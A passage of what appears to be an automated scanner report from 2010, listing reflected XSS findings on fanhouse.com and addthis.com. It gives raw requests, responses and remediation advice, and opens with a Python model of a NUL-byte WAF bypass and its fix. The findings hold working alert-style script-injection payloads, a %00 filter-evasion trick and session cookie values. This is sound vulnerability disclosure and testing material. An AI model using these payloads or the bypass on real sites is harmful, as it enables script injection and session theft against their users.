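The NULL-byte findings above and below describe a filter that sees only part of the input: a check written against a NUL-terminated C string stops at the first 0x00, while the managed-runtime application behind it decodes `%00` into an ordinary byte and keeps going. The following Python example is added here and is not the code of any WAF or of the fanhouse.com application. It is a model: `native_filter_blocks` imitates a strstr-style check on a C string, `length_aware_filter_blocks` is the corrected check, `application_sees` is what the application actually receives, and the `BLOCKED` signature list is an assumption for illustration.

```python
from urllib.parse import unquote_to_bytes

# Assumed block list for the illustration; a real filter has far more signatures,
# but the bypass does not depend on which ones.
BLOCKED = (b"<script", b"alert(", b"expression(")


def native_filter_blocks(raw_path: str) -> bool:
    """Model of a filter written in C against a NUL-terminated buffer (strstr,
    strlen, strcasestr...): everything after the first 0x00 byte is invisible to
    it. This is the behaviour the report's %00 findings exploit. It is a model of
    that class of bug, not any particular product's code."""
    data = unquote_to_bytes(raw_path)          # %00 becomes a real 0x00 byte here
    visible = data.split(b"\x00", 1)[0]        # the C string ends at the first NUL
    lower = visible.lower()
    return any(sig in lower for sig in BLOCKED)


def length_aware_filter_blocks(raw_path: str) -> bool:
    """Corrected check: scan the full decoded buffer by length (memmem-style) and
    treat an embedded NUL as hostile in its own right, because nothing legitimate
    in a URL path contains one."""
    data = unquote_to_bytes(raw_path)
    if b"\x00" in data:
        return True
    lower = data.lower()
    return any(sig in lower for sig in BLOCKED)


def application_sees(raw_path: str) -> bytes:
    """What a managed-runtime application (Java, Python, PHP...) behind the filter
    actually receives: the full decoded buffer, NUL included, which it then copies
    into the page. The filter and the application disagree about where the string
    ends, and that disagreement is the vulnerability."""
    return unquote_to_bytes(raw_path)


if __name__ == "__main__":
    # Constructed paths in the shape of the report's payloads.
    bypass = '/%007f9b5"><script>alert(1)</script>329e06b4101/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/'
    plain = '/7f9b5"><script>alert(1)</script>329e06b4101/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/'
    for path in (plain, bypass):
        print("native filter blocks:      ", native_filter_blocks(path))
        print("length-aware filter blocks:", length_aware_filter_blocks(path))
        print("application receives:      ", application_sees(path)[:40])
```

Even with the filter corrected, the remediation text is right that the real fix belongs in the application: a WAF that is bypassed by one encoding trick will be bypassed by the next, whereas output encoding at the reflection point (as in the canonical-link example earlier) removes the bug regardless of what reaches the application.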
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00b76ba"-alert(1)-"aa1ffaece33 was submitted in the REST URL parameter 1. This input was echoed as b76ba"-alert(1)-"aa1ffaece33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2010%00b76ba"-alert(1)-"aa1ffaece33/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/ HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:17:34 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999975
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25533
var s_code=s_265.t();if(s_code)documen ...[SNIP]...
2.38. http://nfl.fanhouse.com/2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac329"><script>alert(1)</script>767a7aaaf81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/?ac329"><script>alert(1)</script>767a7aaaf81=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/?ac329"><script>alert(1)</script>767a7aaaf81=1"/> ...[SNIP]...
2.39. http://nfl.fanhouse.com/2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0b0f"-alert(1)-"4a7980ce5d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/?b0b0f"-alert(1)-"4a7980ce5d4=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00d9a0d"-alert(1)-"cf3cf947c70 was submitted in the REST URL parameter 1. This input was echoed as d9a0d"-alert(1)-"cf3cf947c70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2010%00d9a0d"-alert(1)-"cf3cf947c70/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/ HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:15:47 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999936
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25533
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7615"><script>alert(1)</script>de4fd2b89eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2010a7615"><script>alert(1)</script>de4fd2b89eb/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/ HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea9c0"><script>alert(1)</script>0744407f85b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ea9c0"><script>alert(1)</script>0744407f85b/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/ HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/ea9c0"><script>alert(1)</script>0744407f85b/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/"/> ...[SNIP]...
2.43. http://nfl.fanhouse.com/2010/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3390"><script>alert(1)</script>fe81c8717e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/?d3390"><script>alert(1)</script>fe81c8717e7=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/2010/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/?d3390"><script>alert(1)</script>fe81c8717e7=1"/> ...[SNIP]...
2.44. http://nfl.fanhouse.com/2010/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed13a"-alert(1)-"cb934aa2908 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/?ed13a"-alert(1)-"cb934aa2908=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11e67"><script>alert(1)</script>836c71c6c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /_uac11e67"><script>alert(1)</script>836c71c6c8f/adpage.html HTTP/1.1 Host: nfl.fanhouse.com Proxy-Connection: keep-alive Referer: http://nfl.fanhouse.com/2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/?abde7%22-alert(document.cookie)-%22af24ef3c633=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_pers=%20s_getnr%3D1292521248881-New%7C1355593248881%3B%20s_nrgvo%3DNew%7C1355593248883%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eb08"-alert(1)-"72e4381cc30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_uac5eb08"-alert(1)-"72e4381cc30/adpage.html HTTP/1.1 Host: nfl.fanhouse.com Proxy-Connection: keep-alive Referer: http://nfl.fanhouse.com/2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/?abde7%22-alert(document.cookie)-%22af24ef3c633=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_pers=%20s_getnr%3D1292521248881-New%7C1355593248881%3B%20s_nrgvo%3DNew%7C1355593248883%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46078"-alert(1)-"cd2da2790c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /crossdomain.xml46078"-alert(1)-"cd2da2790c4 HTTP/1.1 Host: nfl.fanhouse.com Proxy-Connection: keep-alive Referer: http://www.aolcdn.com/sportsdata/redesign/scorecard/ver11/minireskin.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a607"><script>alert(1)</script>a6c30c4b816 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /crossdomain.xml5a607"><script>alert(1)</script>a6c30c4b816 HTTP/1.1 Host: nfl.fanhouse.com Proxy-Connection: keep-alive Referer: http://www.aolcdn.com/sportsdata/redesign/scorecard/ver11/minireskin.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cc5c"-alert(1)-"0db8511b546 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /event-service3cc5c"-alert(1)-"0db8511b546/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8b1c"><script>alert(1)</script>6207525d372 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event-serviceb8b1c"><script>alert(1)</script>6207525d372/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbee0"><script>alert(1)</script>c260551d379 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trafficdbee0"><script>alert(1)</script>c260551d379/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13849"-alert(1)-"d1c72351b07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /traffic13849"-alert(1)-"d1c72351b07/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee753<script>alert(1)</script>3598449dc2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.phpee753<script>alert(1)</script>3598449dc2a HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 18:19:27 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=8jhvef9b1rfar346r540vpb5m4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.phpee753<script>alert(1)</script>3598449dc2a</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be353"-alert(1)-"0ddc5944321 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phpbe353"-alert(1)-"0ddc5944321 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 18:19:27 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=cjcu9v91n8hrrnpf22jivokln5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phpbe353"-alert(1)-"0ddc5944321"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.55. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.addthis.com
Path: /bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0f00"-alert(1)-"4219d71b657 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/e0f00"-alert(1)-"4219d71b657 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 18:19:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 91760
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/e0f00"-alert(1)-"4219d71b657"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b44ce"-alert(1)-"cc2489e18f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/16b44ce"-alert(1)-"cc2489e18f3/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/ HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e23a6"><a%20b%3dc>4f2874815bc was submitted in the REST URL parameter 3. This input was echoed as e23a6"><a b=c>4f2874815bc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2010/12/16e23a6"><a%20b%3dc>4f2874815bc/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/ HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521389573-New%7C1355593389573%3B%20s_nrgvo%3DNew%7C1355593389576%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="referer" value="http://www.fanhouse.com:1080/2010/12/16e23a6"><a b=c>4f2874815bc/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/"> ...[SNIP]...
2.58. http://www.fanhouse.com/2010/12/16/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c64f"><script>alert(1)</script>59f8ffec8bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/16/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/?3c64f"><script>alert(1)</script>59f8ffec8bd=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.fanhouse.com/2010/12/16/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/?3c64f"><script>alert(1)</script>59f8ffec8bd=1"/> ...[SNIP]...
2.59. http://www.fanhouse.com/2010/12/16/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b56d"-alert(1)-"af7479a8180 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
